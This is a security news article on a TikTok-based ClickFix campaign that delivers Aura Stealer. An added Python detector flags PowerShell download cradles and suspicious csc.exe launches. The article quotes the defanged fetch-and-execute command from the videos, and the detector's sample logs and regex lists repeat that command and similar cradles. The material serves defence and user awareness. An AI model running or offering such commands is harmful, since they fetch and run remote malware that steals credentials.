TikTok Videos Fueling New ClickFix Infostealer Attacks

Summary
– Cybercriminals are spreading information-stealing malware through TikTok videos disguised as free activation guides for popular software.
– The campaign uses ClickFix attacks that trick users into running malicious PowerShell commands to infect their computers.
– Executed commands download Aura Stealer malware, which collects and uploads saved credentials, cookies, and cryptocurrency wallet data.
– An additional payload is downloaded to self-compile and inject code, though its purpose remains unclear.
– Users should never copy and run commands from untrusted sources and must reset passwords if they followed these instructions.
A concerning new wave of cyberattacks is spreading through TikTok, where deceptive videos promise free access to premium software but instead deliver dangerous information-stealing malware. These posts, masquerading as activation guides for popular applications, are part of a ClickFix social engineering campaign that tricks users into running malicious commands. Security researchers have observed this ongoing threat, which mirrors tactics identified earlier this year.
The fraudulent TikTok videos claim to provide activation methods for legitimate software such as Windows, Microsoft 365, Adobe Creative Suite applications, and CapCut Pro. They also promote entirely fictitious upgrades for services like Netflix and Spotify Premium. Each video displays a short, one-line command and instructs viewers to execute it with administrator privileges in PowerShell. An example command appears as: iex (irm slmgr[.]win/photoshop). The specific program name within the URL changes based on the software being impersonated.
This technique is a classic ClickFix attack, where seemingly helpful instructions lead users to inadvertently run harmful scripts. When the command is executed, PowerShell contacts a remote server to fetch and run another script. This secondary script proceeds to download two executable files from a Cloudflare Pages domain. The first file, named updater.exe, is identified as a variant of Aura Stealer malware.
Aura Stealer is a potent infostealer designed to harvest a wide array of sensitive data from infected systems. It collects saved usernames and passwords from web browsers, authentication cookies, cryptocurrency wallet information, and credentials from various other applications. All this stolen data is then transmitted to the attackers’ servers, granting them unauthorized access to the victim’s online accounts.
Security analysis indicates a second payload, source.exe, is also downloaded. This file utilizes the .NET framework’s built-in Visual C# compiler to self-compile code, which is subsequently injected and executed directly in the computer’s memory. The exact purpose of this additional component remains unclear to investigators.
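The two behaviours described above, a PowerShell "fetch then execute" one-liner and a .NET compiler launched by a freshly dropped executable, are both visible in process-creation telemetry. The following detector is an added example written for this article, not code from the original report or from any vendor: it applies two rules to constructed, pipe-delimited process records (timestamp, host, parent image, image, command line). Rule one flags a command line that combines a remote-fetch cmdlet or alias (irm, iwr, Invoke-RestMethod, Invoke-WebRequest, DownloadString) with an execute cmdlet or alias (iex, Invoke-Expression), and notes when the defanged domain from the article appears. Rule two flags csc.exe, the .NET Framework C# compiler, when its parent lives in a user-writable directory; the path fragments used for that check and the Temp location of the parent in the sample are assumptions of this example, not details from the article.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Built-in PowerShell aliases and cmdlets for the two halves of a "download cradle":
# something that fetches remote text and something that executes it.
# Matching is done on a normalised (lower-cased) command line.
FETCH_PATTERNS = [
    r"\birm\b", r"\binvoke-restmethod\b",
    r"\biwr\b", r"\binvoke-webrequest\b",
    r"\.downloadstring\s*\(", r"net\.webclient",
]
EXEC_PATTERNS = [r"\biex\b", r"\binvoke-expression\b"]

# Domain named in the article, kept defanged here and refanged only for matching.
KNOWN_BAD_DOMAINS = {"slmgr[.]win"}

# Parent-process locations from which a compiler launch deserves a closer look.
# ASSUMPTION of this example: these fragments are not taken from the article.
USER_WRITABLE_HINTS = ("\\appdata\\local\\temp\\", "\\downloads\\")


@dataclass
class Finding:
    line_no: int
    rule: str
    detail: str


def normalise(text: str) -> str:
    """Lower-case, refang '[.]' and collapse whitespace so defanged IOCs and
    PowerShell's case-insensitive cmdlets/aliases match consistently."""
    return re.sub(r"\s+", " ", text.replace("[.]", ".").lower())


def is_download_cradle(cmdline: str) -> bool:
    """True when the command line both fetches remote content and executes it."""
    c = normalise(cmdline)
    fetches = any(re.search(p, c) for p in FETCH_PATTERNS)
    executes = any(re.search(p, c) for p in EXEC_PATTERNS)
    return fetches and executes


def known_domain(cmdline: str) -> Optional[str]:
    """Return the matching article domain (defanged form) if it is present."""
    c = normalise(cmdline)
    for dom in KNOWN_BAD_DOMAINS:
        if normalise(dom) in c:
            return dom
    return None


def is_suspicious_compiler_launch(parent: str, image: str) -> bool:
    """csc.exe (the .NET Framework C# compiler) started by a process that lives
    in a user-writable directory; build tooling normally lives elsewhere."""
    if not image.lower().endswith("\\csc.exe"):
        return False
    p = parent.lower()
    return any(h in p for h in USER_WRITABLE_HINTS)


def scan(lines: List[str]) -> List[Finding]:
    """Apply both rules to constructed records of the form
    timestamp|host|parent_image|image|command_line."""
    findings: List[Finding] = []
    for no, line in enumerate(lines, 1):
        parts = line.split("|", 4)
        if len(parts) != 5:
            continue  # malformed record; skip rather than guess
        _ts, _host, parent, image, cmdline = parts
        if is_download_cradle(cmdline):
            dom = known_domain(cmdline)
            detail = f"known domain {dom}" if dom else "fetch+execute pattern"
            findings.append(Finding(no, "powershell_download_cradle", detail))
        if is_suspicious_compiler_launch(parent, image):
            findings.append(Finding(no, "csc_from_user_writable_parent", parent))
    return findings


# Constructed sample records. Record 1 mirrors the defanged command from the
# article; records 2 and 5 are benign; 3 is the spelled-out cmdlet form;
# 4 is a compiler launch whose parent path is an assumption of this example.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CSC = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe"
SAMPLE_LOGS = [
    f"2025-01-01T10:00:00Z|WS01|C:\\Windows\\explorer.exe|{PS}"
    "|powershell.exe iex (irm slmgr[.]win/photoshop)",
    f"2025-01-01T10:00:05Z|WS01|C:\\Windows\\explorer.exe|{PS}"
    "|powershell.exe Get-ChildItem C:\\Users",
    f"2025-01-01T10:00:09Z|WS01|C:\\Windows\\explorer.exe|{PS}"
    "|powershell.exe Invoke-Expression (Invoke-WebRequest http://example.invalid/a).Content",
    f"2025-01-01T10:01:00Z|WS01|C:\\Users\\alice\\AppData\\Local\\Temp\\source.exe|{CSC}"
    "|csc.exe /noconfig /fullpaths @C:\\Users\\alice\\AppData\\Local\\Temp\\x.cmdline",
    f"2025-01-01T10:02:00Z|WS01|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe|{CSC}"
    "|csc.exe /noconfig /fullpaths @C:\\build\\proj.cmdline",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"record {f.line_no}: {f.rule} ({f.detail})")
```

The alias matching only catches unobfuscated one-liners of the kind shown in the video; a Base64-encoded or string-built variant will pass these regexes, so in production pair this with PowerShell script block logging, which records the decoded script text at execution time. The compiler rule is a heuristic and will need tuning against legitimate build activity in your environment.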
Anyone who has followed these instructions should operate under the assumption that all their login credentials have been compromised. It is critically important to immediately reset passwords for every website and online service you use. ClickFix attacks have surged in popularity over the last twelve months, becoming a common delivery method for malware in ransomware and cryptocurrency theft operations.
As a fundamental security practice, you should never copy text from an untrusted source, such as a social media video or website, and paste it directly into any system command line interface. This includes the Windows File Explorer address bar, Command Prompt, PowerShell, macOS Terminal, or Linux shell. Always obtain software and activation keys directly from official vendors and distributors.
(Source: Bleeping Computer)